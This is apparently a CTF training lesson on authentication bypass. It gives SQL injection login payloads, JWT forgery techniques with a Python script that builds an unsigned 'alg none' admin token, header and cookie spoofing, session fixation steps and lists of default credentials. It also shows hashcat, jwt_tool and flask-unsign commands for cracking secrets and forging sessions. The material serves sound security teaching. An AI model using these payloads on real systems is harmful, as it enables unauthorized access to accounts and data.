Authentication Bypass

intermediate30 minWriteup

Breaking authentication in CTF challenges

Learning Objectives

  • Find authentication flaws
  • Exploit JWT vulnerabilities
  • Bypass login mechanisms
  • Forge sessions

Authentication bypass challenges test your ability to access restricted areas without valid credentials. From simple parameter tampering to complex JWT attacks, these challenges are CTF favorites!

Authentication bypass is about finding logic flaws, not just guessing passwords. Think about HOW the authentication works, then break that logic.

Simple Bypasses

bash
1606070;"># Parameter manipulation
2606070;"># Original request
3POST /login
4admin=false&user=guest
5 
6606070;"># Modified request
7POST /login
8admin=true&user=guest
9 
10606070;"># URL parameter bypass
11http:606070;">//target.com/admin?authenticated=true
12http:606070;">//target.com/admin?role=admin
13http:606070;">//target.com/admin?isAdmin=1
14 
15606070;"># Cookie manipulation
16606070;"># Original cookie
17Cookie: role=user; authenticated=false
18 
19606070;"># Modified cookie
20Cookie: role=admin; authenticated=true
21 
22606070;"># Header manipulation
23X-Forwarded-For: 127.0.0.1
24X-Originating-IP: 127.0.0.1
25X-Remote-IP: 127.0.0.1
26X-Remote-Addr: 127.0.0.1
27Host: localhost

View Everything

In Burp, examine EVERY parameter - URL, body, cookies, and headers. Any of these could control authentication!

SQL Injection Auth Bypass

sql
1-- Classic authentication bypass
2Username: admin'-- -
3Password: anything
4 
5-- Query becomes:
6-- SELECT * FROM users WHERE username=606070;">#a5d6ff;">'admin'-- -' AND password='anything'
7-- The -- comments out the password check!
8 
9-- Other variations:
10admin'606070;">#
11admin'/*
12606070;">#a5d6ff;">' OR '1'='1'-- -
13' OR 1=1-- -
14606070;">#a5d6ff;">' OR ''='
15606070;">#a5d6ff;">') OR ('1'='1'-- -
16 
17-- When username is validated first:
18admin'--
19admin'606070;">#
20admin'/*
21 
22-- Bypass with UNION
23606070;">#a5d6ff;">' UNION SELECT 'admin','password_hash' -- -
24-- Returns fake row with known password

JWT Vulnerabilities

JSON Web Tokens (JWTs) are common in modern applications. They have several well-known vulnerabilities:

bash
1606070;"># JWT Structure: header.payload.signature
2606070;"># eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZ3Vlc3QifQ.signature
3 
4606070;"># Decode JWT (base64)
5echo 606070;">#a5d6ff;">"eyJ1c2VyIjoiZ3Vlc3QifQ" | base64 -d
6606070;"># {"user":"guest"}
7 
8606070;"># Attack 1: Algorithm None
9606070;"># Change header to: {"alg":"none"}
10606070;"># Remove signature
11606070;"># eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
12 
13606070;"># Attack 2: Algorithm Confusion (RS256 → HS256)
14606070;"># If server uses RS256 (asymmetric), try changing to HS256
15606070;"># Sign with the PUBLIC key as the secret!
16 
17606070;"># Attack 3: Weak Secret
18606070;"># Brute force the secret
19hashcat -a 0 -m 16500 jwt.txt wordlist.txt
20606070;"># Or use jwt_tool
21python3 jwt_tool.py JWT_HERE -C -d wordlist.txt
22 
23606070;"># Attack 4: Key ID (kid) Injection
24606070;"># Header: {"alg":"HS256","kid":"../../dev/null"}
25606070;"># Sign with empty secret
26 
27606070;"># Attack 5: JWK Header Injection
28606070;"># Include your own key in the header
python
1606070;"># Python script to forge JWT with algorithm none
2import base64
3import json
4 
5header = {606070;">#a5d6ff;">"alg": "none", "typ": "JWT"}
6payload = {606070;">#a5d6ff;">"user": "admin", "role": "admin"}
7 
8606070;"># Encode without signature
9def b64url(data):
10    return base64.urlsafe_b64encode(
11        json.dumps(data).encode()
12    ).decode().rstrip(606070;">#a5d6ff;">'=')
13 
14token = f606070;">#a5d6ff;">"{b64url(header)}.{b64url(payload)}."
15print(token)
JWT algorithm "none" is a classic CTF vulnerability. Many real-world libraries have fixed this, but CTF challenges still use it!

Session Manipulation

bash
1606070;"># Cookie value manipulation
2606070;"># Flask session (base64 encoded JSON)
3eyJ1c2VyIjoiZ3Vlc3QifQ.XXX.YYY
4 
5606070;"># Decode:
6echo 606070;">#a5d6ff;">"eyJ1c2VyIjoiZ3Vlc3QifQ" | base64 -d
7606070;"># {"user":"guest"}
8 
9606070;"># If unsigned or weak secret, forge:
10606070;"># {"user":"admin"}
11 
12606070;"># PHP Serialization in cookies
13606070;"># Original: O:4:"User":1:{s:4:"name";s:5:"guest";}
14606070;"># Modified: O:4:"User":1:{s:4:"name";s:5:"admin";}
15 
16606070;"># Session fixation
17606070;"># 1. Get valid session: PHPSESSID=abc123
18606070;"># 2. Send victim link with your session
19606070;"># 3. When they login, you have their session
20 
21606070;"># Session prediction
22606070;"># If sessions are predictable (sequential, timestamp-based)
23606070;"># Generate and test potential session IDs

Logic Flaws

1606070;"># Type juggling (PHP)
2606070;"># "0e12345" == "0e67890" (both evaluate to 0 in comparison)
3606070;"># Use magic hashes that start with 0e and are valid MD5
4606070;"># 240610708 → 0e462097431906509019562988736854
5 
6606070;"># Password reset flaws
7606070;"># 1. Request reset for admin
8606070;"># 2. Intercept reset link parameters
9606070;"># 3. Modify token/user identifier
10606070;"># 4. Reset admin's password
11 
12606070;"># Registration flaws
13606070;"># Register as: admin (with space)
14606070;"># Register as: admin
15606070;"># Register as: ADmin (case manipulation after registration)
16 
17606070;"># Race conditions
18606070;"># 1. Two parallel requests:
19606070;">#    - Register user "admin"
20606070;">#    - Login as "admin"
21606070;"># 2. Timing can grant elevated access
22 
23606070;"># Negative value attacks
24606070;"># quantity=-1 → negative total price
25606070;"># Transfer -$100 → receive money
26 
27606070;"># Default credentials
28admin:admin
29admin:password
30admin:123456
31root:root
32test:test

Think Like a Developer

What shortcuts might a developer take? What edge cases might they forget? Authentication logic is complex - there are always flaws!

Useful Tools

bash
1606070;"># jwt_tool - JWT analysis and attacks
2git clone https:606070;">//github.com/ticarpi/jwt_tool
3python3 jwt_tool.py eyJhbGc...
4 
5606070;"># Scan for known vulnerabilities
6python3 jwt_tool.py -t JWT -M at
7 
8606070;"># Crack secret
9python3 jwt_tool.py -t JWT -C -d wordlist.txt
10 
11606070;"># flask-unsign - Flask session manipulation
12pip install flask-unsign
13 
14606070;"># Decode session
15flask-unsign --decode --cookie 606070;">#a5d6ff;">"eyJ..."
16 
17606070;"># Crack secret
18flask-unsign --unsign --cookie 606070;">#a5d6ff;">"eyJ..." --wordlist wordlist.txt
19 
20606070;"># Forge cookie
21flask-unsign --sign --cookie 606070;">#a5d6ff;">"{'user':'admin'}" --secret "SECRET"
22 
23606070;"># Online tools
24606070;"># jwt.io - Decode and verify JWTs
25606070;"># cyberchef - Encode/decode sessions

Auth Bypass Checklist

1□ Check for direct URL access to admin pages
2□ Manipulate cookies (role, admin, authenticated)
3□ Modify POST parameters
4□ Try SQL injection in login
5□ Check for JWT vulnerabilities
6□ Test default credentials
7□ Look for password reset flaws
8□ Check for registration flaws
9□ Test IP-based restrictions with X-Forwarded-For
10□ Try HTTP method manipulation (GET vs POST)
11□ Look for backup login endpoints (/login2, /admin/login)
12□ Check for exposed credentials in JS/source
13□ Try type juggling attacks (PHP)
14□ Test for race conditions

Knowledge Check

Quick Quiz
Question 1 of 2

What is the JWT 'algorithm none' attack?

Key Takeaways

  • Always check cookies, headers, and parameters for auth-related values
  • SQL injection in login is a classic - always test it
  • JWT "algorithm none" is a common CTF vulnerability
  • Logic flaws are often more valuable than brute force
  • Use jwt_tool and flask-unsign for session analysis
  • Think about HOW authentication works, then break that logic